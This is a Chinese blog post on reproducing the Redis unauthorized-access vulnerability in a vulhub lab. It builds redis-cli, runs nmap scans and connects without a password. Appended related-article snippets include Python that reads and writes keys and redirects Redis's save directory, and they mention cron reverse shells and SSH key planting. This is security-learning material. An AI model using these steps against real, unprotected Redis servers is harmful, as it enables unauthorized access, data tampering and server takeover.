Redis未授权访问漏洞vulhub靶场搭建及复现

于 2024-12-25 22:48:30 发布
阅读量221 收藏
点赞数 3
文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/THZLYXX/article/details/144724286
版权

一、环境搭建

1.进入vulhub拉取启动靶场

2.查看容器运行端口docker ps

3.kali安装redis,先下载安装包

wget http://download.redis.io/releases/redis-2.8.12.tar.gz

 4.解压安装包并进入目录

5.执行make进行编译

6.进入src目录

7.执行以下命令显示Redis客户端命令的帮助信息

./redis-cli -h

二、漏洞复现

1.kali使用nmap进行扫描

nmap -sV --open -p- 192.168.204.129

 2.使用攻击机redis连接目标机redis

cd redis-2.8.12/src/
./redis-cli -h 192.168.204.129

3.连接成功使用info查看信息

THZLYXX
关注
[ vulhub漏洞复现篇 ] Celery <4.0 Redis未授权访问+Pickle反序列化利用
qq_51577576的博客
10-04 1839
[ vulhub漏洞复现篇 ] Celery <4.0 Redis未授权访问+Pickle反序列化利用 Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在未授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。这里我们使用redis的队列服务
漏洞复现redis未授权访问
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-16 1271
Redis服务在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器.上只运行一个Redis进程, 当多个客户端同时访问时,服务器的处理能力是会有一-定程度的下降;即:在实际生产环境中,需要根据实际的需求来决定开启多少个Redis进程。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。....
Redis漏洞复现vulhub靶场
weixin_57240513的博客
08-04 545
看所有键:KEYS *,使用select num可以查看键值数据。redis-cli -h 192.168.4.176-p 6379#redis常见命令。(7)config get dir/dbfilename 获取路径及数据配置信息。进入目录:cd /vulhub-master/redis/4-unacc。启动:docker-compose up -d。(2)删除所有数据库内容:flushall。检查:docker-compose ps。(9)get 变量,查看变量名称。(1)查看信息:info。
vulhubredis
haoaaao的博客
05-01 1197
0x00 4-unacc(未授权访问) 1、介绍 redis默认端口:6379 Redis 是一个高效数据库,默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。 ———————————————— https://blog.youkuaiyun.com/plo
vulhubredis
weixin_56306210的博客
01-22 670
vulhubredis
vulhub漏洞复现redis 4-unacc 未授权访问漏洞
m0_59598029的博客
01-31 1287
第一次看使用公私钥ssh免密登录的过程还有计时任务反弹的过程网络安全真是学无止境。
Redis未授权访问漏洞
qq_45434762的博客
03-08 226
主机信息reids-server:192.168.254.132kali:192.168.254.135redis-cliredis-cli是redis命令行工具./redis-cli -...
vulfocus靶场redis命令执行cve-2022-0543漏洞复现
没有故事
04-18 1071
我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。输入网址和端口,点击OK。
redis未授权访问
m0_56578216的博客
09-02 989
前提条件:1.
Redis 4.x5.x 未授权访问漏洞EXP复现过程
yiiiing的博客
08-25 669
Redis 4.x5.x 未授权访问漏洞EXP复现过程 本次使用Vulhub一键搭建漏洞测试靶场 地址:https://vulhub.org/#/environments/redis/4-unacc/ 搭建过程就不讲了 可以看到已经启动docker了 Nmap探测一下靶机端口 如上图所示,redis服务正常开启了,在6379端口 kali直接用redis连接,发现可直接访问,还能通过info命令查看到服务器等一些敏感信息 然后将exp git clone 到本地 https://github.c
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1948
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
Redis数据库漏洞靶场演练
weixin_42282189的博客
01-10 1299
作者: 村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 以前只知道redis未授权访问redis未授权访问的利用看文章,但自己没有亲手做过,最近接触了一个postgresql的远程命令执行漏洞,我在数据库漏洞利用这块不熟悉,信安之路最近开了数据库的课程,在此记录数据库靶场演练的学习,并分享给大家。 0x02 数据库的安装 2.1 redis安装 下载地址: https://github.com/microsoftarchive/redis/rel.
渗透靶场——vulntarget-a综合靶场
tlovejr的博客
03-24 5098
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
ssrf+redis未授权靶场
actistsec的博客
10-25 2215
自己搭建不太合理的ssrf联动redis未授权
redis安全攻防(专注渗透视角)
LainWith的博客
04-11 3204
数据库作为业务平台信息技术的核心和基础,承载着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,数据库的安全稳定运行也直接决定着业务系统能否正常使用。并且平台的数据库中往往储存着等极其重要和敏感的信息。这些信息一旦被篡改或者泄露,轻则造成企业经济损失,重则影响企业形象,甚至行业、社会安全。可见,数据库安全至关重要。所以对数据库的保护是一项必须的,关键的,重要的工作任务。
未授权访问漏洞复现~~~】
m0_59151303的博客
08-05 2092
步骤二:可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测…步骤二:如果存在未授权访问漏洞则直接访问 http://IP:8888会直接跳到web管理界面,不需要输入密码。步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是 admin/admin,在打开的页面输入…步骤二:在打开的URL中…步骤一:使用以下Fofa语法搜索使用Idap服务的产品.…步骤一:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!
Redis未授权访问漏洞复现与工具安装
Welcome To Myon'Blog !
01-11 2896
redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。Redis未授权访问影响版本为5.0.5以下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
Redis未授权四种利用方式与修复方案
qq_45234543的博客
11-08 5720
想整理一波Redis利用方式,在内网中很容易遇见(方便运维人员) 简介:redis是一个key-value存储系统,nosql - 非关系型数据库,支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及交并差和更丰富的操作,且操作都是原子性。为了保证效率,数据都是缓存在内存中,区别是redis会周期性的把更新的数据写入磁盘或者把修改写入追加的记录文件,并在这个基础上实现了master-slave(主从)同步
Redis未授权访问漏洞复现
最新发布
01-20
### Redis 未授权访问漏洞复现步骤 对于 Redis 未授权访问漏洞复现,可以按照以下方法进行操作: #### 配置环境准备 为了模拟真实的攻击场景并测试安全措施的有效性,需先搭建一个实验环境。确保所使用的 Redis 实例处于隔离环境中,以免造成实际生产系统的风险。 #### 设置无认证模式下的 Redis 服务 默认情况下,如果 Redis 安装完成后没有配置 `requirepass` 参数,则任何客户端都可以连接到该实例而无需提供密码验证[^3]。 ```bash # 查看当前配置状态 cat /usr/local/redis/6379.conf | grep requirepass ``` 当发现上述命令返回为空时,意味着此时 Redis 正运行于开放状态下,允许任意 IP 地址发起请求。 #### 利用工具探测目标主机上的 Redis 状态 通过 nmap 或者其他网络扫描器来检测远程机器上是否存在暴露在外网端口为 6379 的 Redis 数据库实例,并尝试与其建立连接。 ```bash nmap -p 6379 <target_ip> ``` 一旦确认存在这样的情况,就可以利用 Python 脚本或者其他编程语言编写简单的程序去读取或写入数据至数据库内。 #### 执行恶意指令 假设已经成功连上了这台脆弱的服务端设备,那么攻击者便能执行诸如获取键值对、修改配置甚至是发送 shutdown 关闭服务器等危险动作[^2]。 ```python import redis r = redis.Redis(host='<target_ip>', port=6379, db=0) print(r.get('some_key')) # 获取某个 key 对应 value r.set('new_key', 'value') # 插入新的记录 r.config_set('dir', '/tmp/') # 更改工作目录以便后续保存 RDB 文件 r.save() # 强制立即持久化内存中的数据集到磁盘 ``` 以上就是关于 Redis 未授权访问漏洞的一个简单重现过程描述。值得注意的是,在真实世界里实施此类行为属于非法入侵计算机信息系统罪,请务必仅限于合法合规的学习研究用途之内。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值